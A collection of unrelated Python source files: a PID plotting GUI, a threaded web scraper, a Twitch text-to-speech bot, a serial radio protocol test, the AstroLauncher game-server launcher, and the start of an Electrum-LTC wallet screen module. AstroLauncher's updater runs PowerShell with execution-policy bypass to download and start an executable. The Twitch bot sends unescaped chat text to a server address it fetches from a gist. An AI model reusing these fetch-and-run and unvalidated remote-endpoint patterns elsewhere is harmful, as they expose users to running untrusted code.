self.viewer = PidViewer()
self.curve = self.viewer.plot.getPort()
self.model.on_new_node(self.update_selection)
self.viewer.node_selector.set_callback(self._change_selected_node)
self.viewer.pid_loop_selector.set_nodes(self.model.PID_LOOPS)
self.viewer.pid_loop_selector.set_callback(self._change_selected_pid_loop)
self.viewer.params_view.on_edit(self._on_param_edit)
self.model.params_model.on_new_params(self.viewer.params_view.set)
self.viewer.save_button.clicked.connect(self._save_params)
self.viewer.topic.callback = self.model.setpt_pub.update_topic
self.viewer.value_min.callback = self.model.setpt_pub.update_value_min
self.viewer.value_max.callback = self.model.setpt_pub.update_value_max
self.viewer.period.callback = self.model.setpt_pub.update_period
threading.Thread(target=self.run).start()
def run(self):
self.logger.info('PID widget started')
while True:
self.curve.put(self.model.data)
time.sleep(0.2)
def update_selection(self):
self.logger.debug('New node detected, updating available nodes list')
self.viewer.node_selector.set_nodes(self.model.nodes)
def _change_selected_node(self, i):
self.model.tracked_node = self.model.nodes[i]
self.model.clear()
self.logger.info('Selected node {}'.format(self.model.tracked_node))
self.model.params_model.fetch_params(self.selected_node_id(), self.model.tracked_node)
self.model.setpt_pub.update_motor(self.selected_node_id())
def _change_selected_pid_loop(self, i):
self.model.tracked_pid_loop = self.model.PID_LOOPS[i]
self.model.data = {
'setpoint': {'time': np.array([]), 'value': np.array([])},
'measured': {'time': np.array([]), 'value': np.array([])},
}
self.logger.info('Selected PID loop {}'.format(self.model.tracked_pid_loop))
def _on_param_edit(self, item):
target_id = self.model.monitor.name_to_node_id(self.model.tracked_node)
keys = self.model.params_model.item_to_path(item)
name = '/'.join(keys)
value = item.text()
value_type = self.model.params_model.params.get(keys).type
self.model.params_model.set_param(target_id=target_id, name=name, value=value, value_type=value_type)
self.logger.debug('Parameter {name} changed to {value} for node {node} ({target_id})'.format(
name=name, value=item.text(), node=self.model.tracked_node, target_id=target_id))
def _save_params(self):
index = self.viewer.node_selector.currentIndex()
items = list(self.model.monitor.known_nodes.items())
self.model.params_model.save_params(self.selected_node_id())
def selected_node_id(self):
index = self.viewer.node_selector.currentIndex()
items = list(self.model.monitor.known_nodes.items())
return int(items[index][0])
def main(args):
logging.basicConfig(level=max(logging.CRITICAL - (10 * args.verbose), 0))
app = QtGui.QApplication(sys.argv)
app.setFont(QtGui.QFont('Open Sans', pointSize=20))
uavcan.load_dsdl(args.dsdl)
node = UavcanNode(interface=args.interface, node_id=args.node_id)
controller = PidPlotController(node=node)
node.spin()
if (sys.flags.interactive != 1) or not hasattr(QtCore, 'PYQT_VERSION'):
QtGui.QApplication.instance().exec_()
if __name__ == '__main__':
args = argparser().parse_args()
main(args)
|
multi_thread_eg.py | import queue
import requests
from lxml import etree
import time
import threading
urls = [
f'https://www.cnblogs.com/#p{page}'
for page in range(1, 51)
]
def craw(url):
response = requests.get(url)
response.encoding = 'utf-8'
page_text = response.text
return page_text
def parse(html):
tree = etree.HTML(html)
name = tree.xpath('//*[@id="post_list"]/article/section/div/a/text()')
return name
def do_craw(url_queue: queue.Queue, html_Queue: queue.Queue):
while True:
if url_queue.empty():
break
url = url_queue.get()
html = craw(url)
html_Queue.put(html)
print(threading.current_thread().name, f'craw-{url}', 'url.queue.size=', url_queue.qsize())
def do_parse(html_queue: queue.Queue, fout):
while True:
if html_queue.empty() and url_queue.empty():
break
html = html_queue.get()
results = parse(html)
for result in results:
fout.write(str(result) + '\n')
print(threading.current_thread().name, f'results.size', len(results), 'html_queue.size', html_queue.qsize())
if __name__ == '__main__':
url_queue = queue.Queue()
html_queue = queue.Queue()
for url in urls:
url_queue.put(url)
crawl_thread = []
parse_thread = []
start = time.time()
for idx in range(1, 11):
t = threading.Thread(target=do_craw, args=(url_queue, html_queue), name=f'craw{idx}')
t.start()
crawl_thread.append(t)
fout = open('D:\\PYproject\\example_\\q.txt', 'w', encoding='utf-8')
for idx in range(1, 11):
t = threading.Thread(target=do_parse, args=(html_queue, fout), name=f'parse{idx}')
t.start()
parse_thread.append(t)
for t in crawl_thread:
t.join()
for t in parse_thread:
t.join()
end = time.time()
print(f'结束 共花费了{end-start}s')
|
web_bot_controllable_talknet.py | import os
from typing import Text
import numpy as np
import tensorflow as tf
from scipy.io import wavfile
import json
from tqdm import tqdm
import traceback
import ffmpeg
from flask import Flask, request, render_template, send_from_directory, Response
from argparse import ArgumentParser
import transformers
from transformers import AutoModelForSequenceClassification
from transformers import AutoTokenizer
import numpy as np
from scipy.special import softmax
import csv
import time
import rtmidi
import requests
from twitchio.ext import commands
from dotenv import load_dotenv
load_dotenv()
midiout = rtmidi.MidiOut()
available_ports = midiout.get_ports()
#detect position element in list
def detect(list, element):
for i in range(len(list)):
if list[i] == element:
return i
port= detect(available_ports, 'loopMIDI 1')
midiout.open_port(port) # Select midi port
RUN_PATH = os.path.dirname(os.path.realpath(__file__))
def preprocess(text):
new_text = []
for t in text.split(" "):
t = '@user' if t.startswith('@') and len(t) > 1 else t
t = 'http' if t.startswith('http') else t
new_text.append(t)
return " ".join(new_text)
def play(note, duration):
midiout.send_message([0x90, note, 0x7f])
time.sleep(duration)
midiout.send_message([0x80, note, 0x7f])
def signals(i):
switcher={
"negative":40,
"neutral":36,
"positive":38
}
return switcher.get(i,"Invalid day of week")
def list2file(l,f):
with open(f, 'w') as f:
json.dump(l, f, indent = 6)
def file2list(file):
with open(file, 'r') as f:
return json.load(f)
def load_history(f,conversation):
jj = file2list(f)
for j in jj:
if j["is_user"]==False:
conversation.append_response(j["text"])
conversation.mark_processed()
else:
conversation.add_user_input(j["text"])
return conversation
#smart splits that are not cutting words
def smart_split(str,max_lenght):
list = []
lenght_tot=0
full_line=""
#print(str.split())
for s in str.split():
lgn_w=len(s)
lenght_tot=lenght_tot+lgn_w
#print(f"current lenght sum: {lenght_tot}")
if lenght_tot < max_lenght:
full_line=full_line+" "+s
else:
list.append(full_line)
lenght_tot=len(s)
full_line=s
#append the last words
list.append(full_line)
if len(list)==0:
list=[str]
return list
def smart_split_list(full_text,max_lenght):
line = full_text.split(". ")
sub_line=[]
for l in line:
sub_line= sub_line + smart_split(l,max_lenght)
return sub_line
def blande_sentiment(url_server,UTTERANCE,name="test"):
#fetch json from url
url = url_server+"/?text="+UTTERANCE+"&author="+name
print(url)
response = requests.get(url)
print(response.text)
resp = json.loads(response.text)
answer=resp[0]
label= resp[1]
waveurl=resp[2]
print(label)
print(answer)
#print(data)
#print(data["_text"])
return label,answer,waveurl
def sanitize_input(input_str):
stopwords = readListFromFile("Assets/emoticon.lst")
for i in stopwords:
n=input_str.replace(i.strip(),'')
input_str=n
result = input_str.strip()
return result.replace("\n", " ").replace("\r", " ").replace("\t", " ").replace("’", "'").replace("“", "\"").replace("”", "\"").replace("‘","").replace("(",",").replace(")",",")
def sanitize_output(text):
return text.replace("\n", " ").replace("\r", " ").replace("\t", " ").replace("’", "'").replace("“", "\"").replace("”", "\"").replace("?", "?,")
def play_audio_buffer(buffer,rate):
import simpleaudio as sa
play_obj = sa.play_buffer(buffer, 2, 2, rate)
play_obj.wait_done()
# script exit
def play_audio(audio_path):
"""
Play audio
"""
try:
import subprocess
subprocess.call(["ffplay", "-nodisp","-af","atempo=0.9", "-autoexit","-hide_banner","-loglevel","error", audio_path])
#if sys.platform == "win32":
# os.startfile(audio_path)
#else:
# opener = "open" if sys.platform == "darwin" else "xdg-open"
# subprocess.call([opener, audio_path])
except Exception:
return str(traceback.format_exc())
def readListFromFile(file_path):
with open(file_path, 'r') as f:
lines = f.readlines()
return lines
def readFile(file_path):
with open(file_path, 'r') as f:
return f.read()
def writeFile(fileName, text):
f = open(fileName, "w")
f.write(text)
f.close()
def launch_voice(question,author):
#create file .lock
writeFile("./.lock", "")
if author == "":
print("NO auth, enter in manual mode")
answer=sanitize_input(question)
l= "neutral" #getSentiment(answer,DEVICE2,model_sent,tokenizer_sent)
delay=0
else:
#get text
req_text = sanitize_input(question)
if req_text!="":
print("Sanitized input: "+req_text)
writeFile("current.txt", f"{author}'s turn!")
#get answer and sentiment
#read content of https://gist.githubusercontent.com/Nuked88/55e78cb995bce277b4482d836c811fb0/raw/gistfile1.txt
url= requests.get("https://gist.githubusercontent.com/Nuked88/55e78cb995bce277b4482d836c811fb0/raw/gistfile1.txt")
l,answer,waveurl = blande_sentiment(url.text,req_text,author)
answer = sanitize_output(f"{answer}")
else:
print("Skip because it's emoticon only")
delay=15
wav_name="ok"
#send midi for control the character
play(signals(l),1.5)
print(f"Playing audio of: {answer}")
play_audio(waveurl)
writeFile("current.txt", f" ")
#remove file .lock
os.remove("./.lock")
from threading import Thread
b = 1
class Bot(commands.Bot):
def __init__(self):
# Initialise our Bot with our access token, prefix and a list of channels to join on boot...
super().__init__(token=os.environ['TMI_TOKEN'],
client_id=os.environ['CLIENT_ID'],
nick=os.environ['BOT_NICK'],
prefix="!",
initial_channels=[os.environ['CHANNEL']])
async def event_ready(self):
# We are logged in and ready to chat and use commands...
print(f'Logged in as | {self.nick}')
async def event_message(self, message):
print(f"Message received: {message.content} from {message.author.name}")
#check if file .lock exists
if os.path.isfile("./.lock"):
#print("Skip because .lock file exists")
return
else:
# This is where we handle all of our commands...
if message.content.startswith('@aki '):
#await message.channel.send('Hello!')
mess=message.content.replace('@aki ','')
print(f"Message received: {mess} from {message.author.name}")
#launch_voice(mess,message.author.name)
th = Thread(target=launch_voice, args=(message.content,message.author.name ))
th.start()
else:
print(f"Message received: {message.content} from {message.author.name}")
#launch_voice(message.content,message.author.name)
th = Thread(target=launch_voice, args=(message.content,message.author.name ))
th.start()
#await self.handle_commands(message)
#create menu
def create_menu(options, width=30):
menu = []
for option in options:
menu.append(option.ljust(width))
return menu
#show menu
def show_menu(menu):
i=0
for item in menu:
i=i+1
print(f"{i} - {item}")
#get choice
def get_choice(menu):
show_menu(menu)
choice = input(">>> ")
return choice
#handle choice
def handle_choice(choice, menu, options):
# handle invalid choice
if choice.isdigit() and (int(choice) in range(1, len(options) + 1)):
return options[int(choice) - 1]
else:
print("Invalid choice!")
return handle_choice(get_choice(menu), menu, options)
#main
def main():
# Remove the lock file if it exists
if os.path.isfile("./.lock"):
os.remove("./.lock")
# Create a list of options
options = ["QA Mode","Input Text","Get From Txt","Test Emotion" ,"Exit"]
# Create a menu from the options list
menu = create_menu(options)
choice = handle_choice(get_choice(menu), menu, options)
# Play the selected audio
if choice == "QA Mode":
bot = Bot()
bot.run()
elif choice == "Input Text":
while True:
text = input("Enter text: ")
#break the loop when press crtl+x
if text == "":
break
else:
launch_voice(text,"")
elif choice == "Get From Txt":
text = readFile("conversations/read/read.txt")
launch_voice(text,"")
elif choice == "Test Emotion":
play(signals("positive"),1.5)
# Exit the program
elif choice == "Exit":
exit()
#call main
if __name__ == "__main__":
while True:
try:
main()
except Exception:
main()
|
protocol.py | import serial
import threading
class ProtocolTest():
def __init__(self, dev_addr, rf_address=1, baudrate=115200):
self.rf = serial.Serial(dev_addr, baudrate)
self.address = rf_address
self.neighbors = []
def layer3(self, data):
"""
- actual payload
"""
print('[transport layer] ', data)
return
def layer2(self, data):
"""
- check packet type
"""
pkt_type = data[:2].decode()
source_addr = data[2:6]
dest_addr = data[6:10]
print('[network layer] ', 'packet type ', pkt_type, ' from ', source_addr, ' for ', dest_addr)
if pkt_type == '00':
self.send('hello from', pkt_type='01')
return
if pkt_type == '01':
print('new neighbour', source_addr)
# self.send('hello from', pkt_type='01')
return
self.layer3(data[10:])
def layer1(self, data):
"""
- remove total bytes
- remove signal quality (if present)
"""
data_len = data[0]
print('[link layer] ', data_len, ' bytes')
self.layer2(data[1:data_len + 1])
def send(self, data, dest='0000', pkt_type='00'):
# TODO: find a better way of sending, AT commands maybe?
# self.rf.write(bytes(f"t\r", 'utf8'))
print('sending', data, dest, pkt_type)
source_addr = self.address
payload = f'{pkt_type}{source_addr}{dest}{data}'
self.rf.write(bytes(f"send('{payload}')\r", 'utf8'))
def recv(self):
print('waiting data...')
while True:
data = self.rf.readline()
if data[:3].decode() == 'RCV':
self.layer1(data[3:])
# self.send('received')
# return
def listen(self):
print('listen serial port')
th = threading.Thread(target=self.recv)
th.start()
return th |
AstroLauncher.py | import argparse
import asyncio
import atexit
import ctypes
import dataclasses
import os
import shutil
import subprocess
import sys
import time
from threading import Thread
import requests
from watchdog.events import FileSystemEventHandler
from watchdog.observers import Observer
import cogs.AstroAPI as AstroAPI
import cogs.AstroWebServer as AstroWebServer
import cogs.ValidateSettings as ValidateSettings
from cogs.AstroDaemon import AstroDaemon
from cogs.AstroDedicatedServer import AstroDedicatedServer
from cogs.AstroLogging import AstroLogging
from cogs.MultiConfig import MultiConfig
from cogs.AstroRCON import AstroRCON
"""
Build:
pyinstaller AstroLauncher.py -F --add-data "assets;./assets" --icon=assets/astrolauncherlogo.ico
or
python BuildEXE.py
"""
class AstroLauncher():
""" Starts a new instance of the Server Launcher"""
@dataclasses.dataclass
class LauncherConfig():
DisableAutoUpdate: bool = False
ServerStatusFrequency: float = 2
PlayfabAPIFrequency: float = 2
DisableBackupRetention: bool = False
BackupRetentionPeriodHours: float = 76
BackupRetentionFolderLocation: str = r"Astro\Saved\Backup\LauncherBackups"
EnableAutoRestart: bool = False
AutoRestartEveryHours: float = 24
AutoRestartSyncTimestamp: str = "00:00"
DisableNetworkCheck: bool = False
DisableWebServer: bool = False
WebServerPort: int = 5000
DisableServerConsolePopup: bool = False
def __post_init__(self):
# pylint: disable=no-member
hasError = False
for field, data in self.__dataclass_fields__.items():
try:
self.__dict__[field] = data.type(self.__dict__[field])
except ValueError:
hasError = True
AstroLogging.logPrint(
f"INI error: {field} must be of type {data.type.__name__}", "critical")
if hasError:
AstroLogging.logPrint(
"Fix your launcher config file!", "critical")
sys.exit()
class SaveHandler(FileSystemEventHandler):
def __init__(self, launcher):
self.launcher = launcher
self.astroPath = self.launcher.astroPath
self.moveToPath = self.launcher.launcherConfig.BackupRetentionFolderLocation
super().__init__()
def on_modified(self, event):
time.sleep(1)
dirName = os.path.dirname(event.src_path)
fileName = [f for f in os.listdir(
dirName) if os.path.isfile(os.path.join(dirName, f))][0]
AstroLogging.logPrint(f"Server saved. {fileName}")
self.launcher.saveObserver.stop()
class BackupHandler(FileSystemEventHandler):
def __init__(self, launcher):
self.launcher = launcher
self.astroPath = self.launcher.astroPath
self.moveToPath = self.launcher.launcherConfig.BackupRetentionFolderLocation
self.retentionPeriodHours = self.launcher.launcherConfig.BackupRetentionPeriodHours
super().__init__()
def on_modified(self, event):
# AstroLogging.logPrint("File in save directory changed")
path = os.path.join(self.astroPath, self.moveToPath)
try:
if not os.path.exists(path):
os.makedirs(path)
except Exception as e:
AstroLogging.logPrint(e, "error")
now = time.time()
try:
for f in os.listdir(path):
fpath = os.path.join(path, f)
if os.stat(fpath).st_mtime < (now - (self.retentionPeriodHours * 60 * 60)):
os.remove(fpath)
except Exception as e:
AstroLogging.logPrint(e, "error")
AstroLogging.logPrint("Copying backup to retention folder.")
time.sleep(1)
try:
dirName = os.path.dirname(event.src_path)
newFile = os.path.join(dirName, [f for f in os.listdir(
dirName) if os.path.isfile(os.path.join(dirName, f))][0])
# AstroLogging.logPrint(newFile, "debug")
shutil.copy2(newFile, path)
# AstroLogging.logPrint(copiedFile, "debug")
except FileNotFoundError as e:
AstroLogging.logPrint(e, "error")
except Exception as e:
AstroLogging.logPrint(e, "error")
self.launcher.backupObserver.stop()
def __init__(self, astroPath, launcherINI="Launcher.ini", disable_auto_update=None):
# check if path specified
if astroPath is not None:
if os.path.exists(os.path.join(astroPath, "AstroServer.exe")):
self.astroPath = astroPath
else:
print("Specified path does not contain the server executable")
time.sleep(5)
# check if executable in current directory
elif os.path.exists(os.path.join(os.getcwd(), "AstroServer.exe")):
self.astroPath = os.getcwd()
# fallback to automatic detection (experimental, do NOT rely on it)
else:
try:
autoPath = AstroAPI.getInstallPath()
if os.path.exists(os.path.join(autoPath, "AstroServer.exe")):
self.astroPath = autoPath
except:
AstroLogging.logPrint(
"Unable to find AstroServer.exe!", "critical")
return
AstroLogging.setup_logging(self.astroPath)
self.launcherINI = launcherINI
self.launcherConfig = self.LauncherConfig()
self.launcherPath = os.getcwd()
self.refresh_launcher_config()
if disable_auto_update is not None:
self.launcherConfig.DisableAutoUpdate = disable_auto_update
self.version = "v1.4.6"
self.latestURL = "https://github.com/ricky-davis/AstroLauncher/releases/latest"
self.isExecutable = os.path.samefile(sys.executable, sys.argv[0])
self.headers = AstroAPI.base_headers
self.DaemonProcess = None
self.saveObserver = None
self.backupObserver = None
self.DSServerStats = None
self.DedicatedServer = AstroDedicatedServer(
self.astroPath, self)
AstroLogging.logPrint(
f"AstroLauncher - Unofficial Dedicated Server Launcher {self.version}")
AstroLogging.logPrint(
"If you encounter any bugs please open a new issue at:")
AstroLogging.logPrint(
"https://github.com/ricky-davis/AstroLauncher/issues")
AstroLogging.logPrint(
"To safely stop the launcher and server press CTRL+C")
self.check_for_update()
AstroLogging.logPrint("Starting a new session")
if not self.launcherConfig.DisableNetworkCheck:
AstroLogging.logPrint("Checking the network configuration..")
self.check_network_config()
self.headers['X-Authorization'] = AstroAPI.generate_XAUTH(
self.DedicatedServer.settings.ServerGuid)
self.save_reporting()
if not self.launcherConfig.DisableBackupRetention:
self.backup_retention()
AstroLogging.logPrint("Backup retention started")
# setup queue for data exchange
if not self.launcherConfig.DisableWebServer:
# start http server
self.webServer = self.start_WebServer()
AstroLogging.logPrint(
f"HTTP Server started at 127.0.0.1:{self.launcherConfig.WebServerPort}")
atexit.register(self.DedicatedServer.kill_server,
reason="Launcher shutting down",
save=True)
self.start_server()
def save_reporting(self):
if self.saveObserver:
if not self.saveObserver.is_alive():
self.saveObserver = None
self.save_reporting()
else:
self.saveObserver = Observer()
saveGamePath = r"Astro\Saved\SaveGames"
watchPath = os.path.join(
self.astroPath, saveGamePath)
try:
if not os.path.exists(watchPath):
os.makedirs(watchPath)
except Exception as e:
AstroLogging.logPrint(e)
self.saveObserver.schedule(
self.SaveHandler(self), watchPath)
self.saveObserver.start()
def backup_retention(self):
if self.backupObserver:
if not self.backupObserver.is_alive():
self.backupObserver = None
self.backup_retention()
else:
self.backupObserver = Observer()
backupSaveGamePath = r"Astro\Saved\Backup\SaveGames"
watchPath = os.path.join(
self.astroPath, backupSaveGamePath)
try:
if not os.path.exists(watchPath):
os.makedirs(watchPath)
except Exception as e:
AstroLogging.logPrint(e)
self.backupObserver.daemon = True
self.backupObserver.schedule(
self.BackupHandler(self), watchPath)
self.backupObserver.start()
def refresh_launcher_config(self):
field_names = set(
f.name for f in dataclasses.fields(self.LauncherConfig))
cleaned_config = {k: v for k,
v in self.get_launcher_config().items() if k in field_names}
self.launcherConfig = dataclasses.replace(
self.launcherConfig, **cleaned_config)
config = MultiConfig()
config.read_dict({"AstroLauncher": cleaned_config})
with open(self.launcherINI, 'w') as configfile:
config.write(configfile)
def get_launcher_config(self):
baseConfig = {
"AstroLauncher": dataclasses.asdict(self.LauncherConfig())
}
config = MultiConfig().baseline(self.launcherINI, baseConfig)
# print(settings)
settings = config.getdict()['AstroLauncher']
return settings
def check_for_update(self):
try:
url = "https://api.github.com/repos/ricky-davis/AstroLauncher/releases/latest"
data = ((requests.get(url)).json())
latestVersion = data['tag_name']
if latestVersion != self.version:
AstroLogging.logPrint(
f"UPDATE: There is a newer version of the launcher out! {latestVersion}")
AstroLogging.logPrint(f"Download it at {self.latestURL}")
if self.isExecutable and not self.launcherConfig.DisableAutoUpdate:
self.autoupdate(data)
except:
pass
def autoupdate(self, data):
x = data
downloadFolder = os.path.dirname(sys.executable)
for fileObj in x['assets']:
downloadURL = fileObj['browser_download_url']
fileName = (os.path.splitext(fileObj['name'])[0])
downloadPath = os.path.join(downloadFolder, fileName)
downloadCMD = ["powershell", '-executionpolicy', 'bypass', '-command',
'Write-Host "Starting download of latest AstroLauncher.exe..";', 'wait-process', str(
os.getpid()), ';',
'[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;',
'Invoke-WebRequest', f"'{downloadURL}'", "-OutFile", f"'{downloadPath + '_new.exe'}'", ';',
"Move-Item", "-path", f"'{downloadPath + '_new.exe'}'", "-destination", f"'{downloadPath + '.exe'}'", "-Force;",
'Start-Process', f"'{downloadPath + '.exe'}' --noupdate"]
# print(' '.join(downloadCMD))
subprocess.Popen(downloadCMD, shell=True,
creationflags=subprocess.DETACHED_PROCESS)
time.sleep(2)
self.DedicatedServer.kill_server("Auto-Update")
def start_server(self):
"""
Starts the Dedicated Server process and waits for it to be registered
"""
self.DedicatedServer.status = "starting"
self.DedicatedServer.busy = False
self.DSServerStats = None
oldLobbyIDs = self.DedicatedServer.deregister_all_server()
AstroLogging.logPrint("Starting Server process...")
if self.launcherConfig.EnableAutoRestart:
AstroLogging.logPrint(
f"Next restart is at {self.DedicatedServer.nextRestartTime}")
time.sleep(5)
startTime = time.time()
self.DedicatedServer.start()
self.DaemonProcess = AstroDaemon.launch(
executable=self.isExecutable, consolePID=self.DedicatedServer.process.pid)
# Wait for server to finish registering...
while not self.DedicatedServer.registered:
try:
if self.DSServerStats is None:
try:
tempStats = AstroRCON.DSServerStatistics(
self.DedicatedServer.settings.ConsolePort)
if tempStats is not None:
self.DSServerStats = tempStats
AstroLogging.logPrint(
f"Server version: v{tempStats['build']}")
except:
pass
serverData = (AstroAPI.get_server(
self.DedicatedServer.ipPortCombo, self.headers))
serverData = serverData['data']['Games']
lobbyIDs = [x['LobbyID'] for x in serverData]
if len(set(lobbyIDs) - set(oldLobbyIDs)) == 0:
time.sleep(self.launcherConfig.PlayfabAPIFrequency)
else:
now = time.time()
if now - startTime > 15:
self.DedicatedServer.registered = True
del oldLobbyIDs
self.DedicatedServer.LobbyID = serverData[0]['LobbyID']
if self.DedicatedServer.process.poll() is not None:
AstroLogging.logPrint(
"Server was forcefully closed before registration. Exiting....")
return False
except KeyboardInterrupt:
self.DedicatedServer.kill_server("Launcher shutting down")
except:
AstroLogging.logPrint(
"Failed to check server. Probably hit rate limit. Backing off and trying again...")
self.launcherConfig.PlayfabAPIFrequency += 1
time.sleep(self.launcherConfig.PlayfabAPIFrequency)
doneTime = time.time()
elapsed = doneTime - startTime
AstroLogging.logPrint(
f"Server ready with ID {self.DedicatedServer.LobbyID}. Took {round(elapsed,2)} seconds to register.")
self.DedicatedServer.status = "ready"
self.DedicatedServer.server_loop()
def check_network_config(self):
networkCorrect = ValidateSettings.test_network(
self.DedicatedServer.settings.PublicIP, int(self.DedicatedServer.settings.Port), False)
if networkCorrect:
AstroLogging.logPrint("Server network configuration good!")
else:
AstroLogging.logPrint(
"I can't seem to validate your network settings..", "warning")
AstroLogging.logPrint(
f"Make sure to Port Forward ({self.DedicatedServer.settings.Port} UDP) and enable NAT Loopback", "warning")
AstroLogging.logPrint(
"If nobody can connect, Port Forward.", "warning")
AstroLogging.logPrint(
"If others are able to connect, but you aren't, enable NAT Loopback.", "warning")
rconNetworkCorrect = not (ValidateSettings.test_network(
self.DedicatedServer.settings.PublicIP, int(self.DedicatedServer.settings.ConsolePort), True))
if rconNetworkCorrect:
AstroLogging.logPrint("Remote Console network configuration good!")
else:
AstroLogging.logPrint(
f"SECURITY ALERT: Your console port ({self.DedicatedServer.settings.ConsolePort}) is Port Forwarded!", "warning")
AstroLogging.logPrint(
"SECURITY ALERT: This allows anybody to control your server.", "warning")
AstroLogging.logPrint(
"SECURITY ALERT: Disable this ASAP to prevent issues.", "warning")
time.sleep(5)
def start_WebServer(self):
ws = AstroWebServer.WebServer(self)
def start_server():
if sys.version_info.minor > 7:
asyncio.set_event_loop_policy(
asyncio.WindowsSelectorEventLoopPolicy())
asyncio.set_event_loop(asyncio.new_event_loop())
ws.run()
t = Thread(target=start_server, args=())
t.daemon = True
t.start()
return ws
if __name__ == "__main__":
try:
os.system("title AstroLauncher - Unofficial Dedicated Server Launcher")
except:
pass
try:
parser = argparse.ArgumentParser()
parser.add_argument(
"-p", "--path", help="Set the server folder path", type=str.lower)
parser.add_argument("-d", "--daemon", dest="daemon",
help="Set the launcher to run as a Daemon", action='store_true')
parser.add_argument("-U", "--noupdate", dest="noautoupdate", default=None,
help="Disable autoupdate if running as exe", action='store_true')
parser.add_argument(
"-c", "--consolepid", help="Set the consolePID for the Daemon", type=str.lower)
parser.add_argument(
"-l", "--launcherpid", help="Set the launcherPID for the Daemon", type=str.lower)
args = parser.parse_args()
if args.daemon:
if args.consolepid and args.launcherpid:
kernel32 = ctypes.WinDLL('kernel32')
user32 = ctypes.WinDLL('user32')
SW_HIDE = 0
hWnd = kernel32.GetConsoleWindow()
if hWnd:
user32.ShowWindow(hWnd, SW_HIDE)
AstroDaemon().daemon(args.launcherpid, args.consolepid)
else:
print("Insufficient launch options!")
else:
AstroLauncher(args.path, disable_auto_update=args.noautoupdate)
except KeyboardInterrupt:
pass
|
screens.py | import asyncio
from weakref import ref
from decimal import Decimal
import re
import threading
import traceback, sys
from typing import TYPE_CHECKING, List, Optional, Dict, Any
from kivy.app import App
from kivy.cache import Cache
from kivy.clock import Clock
from kivy.compat import string_types
from kivy.properties import (ObjectProperty, DictProperty, NumericProperty,
ListProperty, StringProperty)
from kivy.uix.recycleview import RecycleView
from kivy.uix.label import Label
from kivy.uix.behaviors import ToggleButtonBehavior
from kivy.uix.image import Image
from kivy.lang import Builder
from kivy.factory import Factory
from kivy.utils import platform
from electrum_ltc.util import profiler, parse_URI, format_time, InvalidPassword, NotEnoughFunds, Fiat
from electrum_ltc.invoices import (PR_TYPE_ONCHAIN, PR_TYPE_LN, PR_DEFAULT_EXPIRATION_WHEN_CREATING,
PR_PAID, PR_UNKNOWN, PR_EXPIRED, PR_INFLIGHT,
LNInvoice, pr_expiration_values, Invoice, OnchainInvoice)
from electrum_ltc import bitcoin, constants
from electrum_ltc.transaction import Transaction, tx_from_any, PartialTransaction, PartialTxOutput
from electrum_ltc.util import parse_URI, InvalidBitcoinURI, TxMinedInfo, maybe_extract_bolt11_invoice
from electrum_ltc.wallet import InternalAddressCorruption
from electrum_ltc import simple_config
from electrum_ltc.lnaddr import lndecode
from electrum_ltc.lnutil import RECEIVED, SENT, PaymentFailure
from electrum_ltc.logging import Logger
from .dialogs.question import Question
from .dialogs.lightning_open_channel import LightningOpenChannelDialog
from electrum_ltc.gui.kivy import KIVY_GUI_PATH
from electrum_ltc.gui.kivy.i18n import _
if TYPE_CHECKING:
from electrum_ltc.gui.kivy.main_window import ElectrumWindow
from electrum_ltc.paymentrequest import PaymentRequest
class HistoryRecycleView(RecycleView):
pass
class RequestRecycleView(RecycleView):
pass
class PaymentRecycleView(RecycleView):
pass
class CScreen(Factory.Screen):
__events__ = ('on_activate', 'on_deactivate', 'on_enter', 'on_leave')
action_view = ObjectProperty(None)
kvname = None
app = App.get_running_app() # type: ElectrumWindow
def on_enter(self):
# FIXME: use a proper event don't use animation time of screen
Clock.schedule_once(lambda dt: self.dispatch('on_activate'), .25)
pass
def update(self):
pass
def on_activate(self):
setattr(self.app, self.kvname + '_screen', self)
self.update()
def on_leave(self):
self.dispatch('on_deactivate')
def on_deactivate(self):
pass
# note: this list needs to be kept in sync with another in qt
TX_ICONS = [
"unconfirmed",
"close",
"unconfirmed",
"close",
"clock1",
"clock2",
"clock3",
"clock4",
"clock5",
"confirmed",
]
Builder.load_file(KIVY_GUI_PATH + '/uix/ui_screens/history.kv')
Builder.load_file(KIVY_GUI_PATH + '/uix/ui_screens/send.kv')
Builder.load_file(KIVY_GUI_PATH + '/uix/ui_screens/receive.kv')
class HistoryScreen(CScreen):
tab = ObjectProperty(None)
kvname = 'history'
cards = {}
def __init__(self, **kwargs):
self.ra_dialog = None
super(HistoryScreen, self).__init__(**kwargs)
def show_item(self, obj):
key = obj.key
tx_item = self.history.get(key)
if tx_item.get('lightning') and tx_item['type'] == 'payment':
self.app.lightning_tx_dialog(tx_item)
return
if tx_item.get('lightning'):
tx = self.app.wallet.lnworker.lnwatcher.db.get_transaction(key)
else:
tx = self.app.wallet.db.get_transaction(key)
if not tx:
return
self.app.tx_dialog(tx)
def get_card(self, tx_item): #tx_hash, tx_mined_status, value, balance):
is_lightning = tx_item.get('lightning', False)
timestamp = tx_item['timestamp']
key = tx_item.get('txid') or tx_item['payment_hash']
if is_lightning:
status = 0
status_str = 'unconfirmed' if timestamp is None else format_time(int(timestamp))
icon = f'atlas://{KIVY_GUI_PATH}/theming/light/lightning'
message = tx_item['label']
fee_msat = tx_item['fee_msat']
fee = int(fee_msat/1000) if fee_msat else None
fee_text = '' if fee is None else 'fee: %d sat'%fee
else:
tx_hash = tx_item['txid']
conf = tx_item['confirmations']
tx_mined_info = TxMinedInfo(height=tx_item['height'],
conf=tx_item['confirmations'],
timestamp=tx_item['timestamp'])
status, status_str = self.app.wallet.get_tx_status(tx_hash, tx_mined_info)
icon = f'atlas://{KIVY_GUI_PATH}/theming/light/' + TX_ICONS[status]
message = tx_item['label'] or tx_hash
fee = tx_item['fee_sat']
fee_text = '' if fee is None else 'fee: %d sat'%fee
ri = {}
ri['screen'] = self
ri['key'] = key
ri['icon'] = icon
ri['date'] = status_str
ri['message'] = message
ri['fee_text'] = fee_text
value = tx_item['value'].value
if value is not None:
ri['is_mine'] = value <= 0
ri['amount'] = self.app.format_amount(value, is_diff = True)
if 'fiat_value' in tx_item:
ri['quote_text'] = str(tx_item['fiat_value'])
return ri
def update(self, see_all=False):
wallet = self.app.wallet
if wallet is None:
return
self.history = wallet.get_full_history(self.app.fx)
history = reversed(self.history.values())
history_card = self.ids.history_container
history_card.data = [self.get_card(item) for item in history]
class SendScreen(CScreen, Logger):
kvname = 'send'
payment_request = None # type: Optional[PaymentRequest]
parsed_URI = None
def __init__(self, **kwargs):
CScreen.__init__(self, **kwargs)
Logger.__init__(self)
self.is_max = False
def set_URI(self, text: str):
